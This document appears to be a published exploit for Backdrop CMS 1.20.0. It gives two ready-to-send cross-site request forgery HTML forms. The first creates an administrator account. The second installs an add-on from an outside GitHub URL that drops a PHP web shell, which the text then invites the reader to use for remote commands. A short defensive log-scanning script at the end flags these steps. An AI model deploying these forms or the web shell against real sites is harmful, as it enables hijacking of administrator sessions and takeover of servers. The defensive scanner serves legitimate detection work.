# Exploit Title: Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Exploit Author: V1n1v131r4
# Date: 2021-09-22
# Vendor Homepage: https://backdropcms.org/
# Software Link: https://github.com/backdrop/backdrop/releases/download/1.20.0/backdrop.zip
# Version: 1.20.0
# Tested On: Kali Linux, Ubuntu 20.04
# Description: Backdrop CMS suffers from a Cross-Site Request Forgery vulnerability allowing remote attackers to add a new user with administrator privileges.
# Description: Backdrop CMS suffers from a Cross-Site Request Forgery vulnerability allowing remote attackers to gain Remote Code Execution (RCE) on the hosting web server by uploading a malicious add-on containing a crafted PHP file.

<html>
<body>
<form method="POST" action="http://example.com/backdrop/?q=admin/people/create">
<input type="text" name="q" value="admin/people/create">
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
<input type="text" name="name" value="hacker">
<input type="text" name="mail" value="hacker@hacker.com">
<input type="text" name="notify" value="1">
<input type="text" name="pass" value="admin">
<input type="text" name="form_build_id" value="form-fPIKc40E3Yp2JOBgAd6gFbMJFsihncTANLNRWwPRWIY">
<input type="text" name="form_token" value="AtrGRG9-8zS8-GoKbYL3niPjqnZP2zTirEqB4E_kS9I">
<input type="text" name="form_id" value="user_register_form">
<input type="text" name="status" value="1">
<input type="text" name="roles[administrator]" value="administrator">
<input type="text" name="op" value="Create new account">
<input type="submit" value="Send">
</form>
</body>
</html>

# Step 1
# Send this page below to the victim

<html>
<body>
<form method="POST" action="http://example.com/backdrop/?q=system/ajax">
<input type="text" name="q" value="system/ajax">
<input type="text" name="Backdrop.tableDrag.showWeight" value="0">
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
<input type="text" name="bulk" value="">
<input type="text" name="project_url" value="https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS/releases/download/backdrop/reference.tar">
<input type="text" name="files[project_upload]" value="">
<input type="text" name="form_build_id" value="form-p-BrvXTDPqUhhAatHFr4d_dQKt6Dn5d-mIf4hwFyuJA">
<input type="text" name="form_token" value="aYigpmZz3OXNHnjJTO2Tu43IXMKyrMXvB2yL-4NFbTw">
<input type="text" name="form_id" value="installer_manager_install_form">
<input type="text" name="_triggering_element_name" value="op">
<input type="text" name="_triggering_element_value" value="Install">
<input type="text" name="ajax_html_ids[]" value="skip-link">
<input type="text" name="ajax_html_ids[]" value="main-content">
<input type="text" name="ajax_html_ids[]" value="installer-browser-filters-form">
<input type="text" name="ajax_html_ids[]" value="edit-search-text">
<input type="text" name="ajax_html_ids[]" value="edit-submit">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-bootstrap_lite">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-corporate_kiss">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lateral">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-colihaut">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-shasetsu">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-borg">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-pelerine">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-cleanish">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-materialize">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lumi">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-tatsu">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-mero">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-snazzy">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-afterlight_tribute">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-minicss">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-zurb_foundation_6">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-thesis">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-summer_fun">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-news_arrow">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-basis_contrib">
<input type="text" name="ajax_html_ids[]" value="installer-browser-manual-install-link">
<input type="text" name="ajax_html_ids[]" value="edit-link">
<input type="text" name="ajax_html_ids[]" value="admin-bar">
<input type="text" name="ajax_html_ids[]" value="admin-bar-wrapper">
<input type="text" name="ajax_html_ids[]" value="admin-bar-icon">
<input type="text" name="ajax_html_ids[]" value="admin-bar-menu">
<input type="text" name="ajax_html_ids[]" value="admin-bar-extra">
<input type="text" name="ajax_html_ids[]" value="admin-bar-search-items">
<input type="text" name="ajax_html_ids[]" value="ui-id-1">
<input type="text" name="ajax_html_ids[]" value="backdrop-modal">
<input type="text" name="ajax_html_ids[]" value="installer-manager-install-form">
<input type="text" name="ajax_html_ids[]" value="edit-bulk-wrapper">
<input type="text" name="ajax_html_ids[]" value="edit-bulk">
<input type="text" name="ajax_html_ids[]" value="edit-project-url-wrapper">
<input type="text" name="ajax_html_ids[]" value="edit-project-url">
<input type="text" name="ajax_html_ids[]" value="edit-project-upload-wrapper">
<input type="text" name="ajax_html_ids[]" value="edit-project-upload">
<input type="text" name="ajax_html_ids[]" value="edit-actions">
<input type="text" name="ajax_html_ids[]" value="edit-submit--2">
<input type="text" name="ajax_page_state[theme]" value="seven">
<input type="text" name="ajax_page_state[theme_token]" value="RY9h420qjWmejTKFp7C0ytS__FtpWnVmEjVCnHWFblo">
<input type="text" name="ajax_page_state[css][core/misc/normalize.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/messages.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.admin.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/layout/css/grid-flexbox.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/contextual/css/contextual.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/comment/css/comment.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/date/css/date.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/field/css/field.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/search/search.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/user/css/user.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/views/css/views.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar-print.css]" value="1">
<input type="text" name="ajax_page_state[css][core/layouts/boxton/boxton.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/installer/css/installer.css]" value="1">
<input type="text" name="ajax_page_state[css][core/themes/seven/css/seven.base.css]" value="1">
<input type="text" name="ajax_page_state[css][core/themes/seven/css/style.css]" value="1">
<input type="text" name="ajax_page_state[css][core/themes/seven/css/responsive-tabs.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/opensans/opensans.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.core.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.button.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.draggable.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.resizable.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.dialog.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/dialog.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.theme.css]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/html5.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery-extend-3.4.0.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery-html-prefilter-3.5.0.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.once.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/backdrop.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/layout/js/grid-fallback.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ajax.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.form.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/contextual/js/contextual.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/form.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/admin_bar/js/admin_bar.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/installer/js/installer.project_list.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/progress.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/tableheader.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/dismiss.js]" value="1">
<input type="text" name="ajax_page_state[js][core/themes/seven/js/script.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.data.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.disable-selection.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.labels.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.scroll-parent.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.tabbable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.unique-id.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.version.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.escape-selector.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.focusable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form-reset-mixin.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.ie.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.keycode.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.plugin.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-active-element.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-blur.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.widget.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/textarea.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.button.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.mouse.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.ui.touch-punch.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.draggable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.position.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.resizable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.dialog.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/dialog.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/dialog.ajax.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/collapse.js]" value="1">
<input type="submit" value="Send">
</form>
</body>
</html>

Run on your browser: http://example.com/backdrop/modules/reference/shell.php?cmd=[command] to execute remote commands.
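As an added defender-side example (not part of the original advisory or of Backdrop CMS), here is a small Python scan over constructed web-server log lines that flags the two cross-site POSTs the PoC forms make (to q=admin/people/create and q=system/ajax, judged by a Referer host other than the site) and any request carrying cmd= to the shell.php path named in the final step. The combined log format, the site host example.com and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Assumed site host; the PoC uses example.com as its placeholder target.
SITE_HOST = "example.com"
# The two routes the PoC forms POST to, and the path its last step calls.
CSRF_TARGETS = {"admin/people/create", "system/ajax"}
WEBSHELL_PATH = "/backdrop/modules/reference/shell.php"

# Apache/nginx combined log format (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return a reason string if the line matches a step of the PoC, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("path"))
    query = parse_qs(url.query)
    q = query.get("q", [""])[0]
    # CSRF steps: a POST to the user-creation or installer AJAX route whose
    # Referer is not the site itself (a forged form is hosted elsewhere).
    if m.group("method") == "POST" and q in CSRF_TARGETS:
        ref_host = urlparse(m.group("referer")).hostname
        if ref_host != SITE_HOST:
            return f"cross-site POST to q={q} (referer host {ref_host!r})"
    # Final step: any request carrying cmd= to the dropped shell.php.
    if url.path == WEBSHELL_PATH and "cmd" in query:
        return "webshell access: " + WEBSHELL_PATH
    return None


def scan(lines):
    """Return (index, reason) pairs for every flagged line."""
    return [(i, r) for i, line in enumerate(lines) if (r := classify(line))]


# Constructed sample log lines: 0 and 2 are the forged POSTs, 1 is a genuine
# admin submission, 3 is the webshell call, 4 is ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Sep/2021:10:00:01 +0000] "POST /backdrop/?q=admin/people/create HTTP/1.1" 302 0 "http://attacker.invalid/csrf.html" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Sep/2021:10:00:09 +0000] "POST /backdrop/?q=admin/people/create HTTP/1.1" 302 0 "http://example.com/backdrop/?q=admin/people/create" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Sep/2021:10:01:30 +0000] "POST /backdrop/?q=system/ajax HTTP/1.1" 200 512 "http://attacker.invalid/install.html" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Sep/2021:10:05:00 +0000] "GET /backdrop/modules/reference/shell.php?cmd=id HTTP/1.1" 200 77 "-" "curl/7.68.0"',
    '198.51.100.7 - - [22/Sep/2021:10:05:10 +0000] "GET /backdrop/?q=node/1 HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_LOG):
        print(idx, reason)
```

A Referer check is only a detection heuristic; the durable fix is Backdrop validating its form tokens server-side so that a forged submission is rejected regardless of origin.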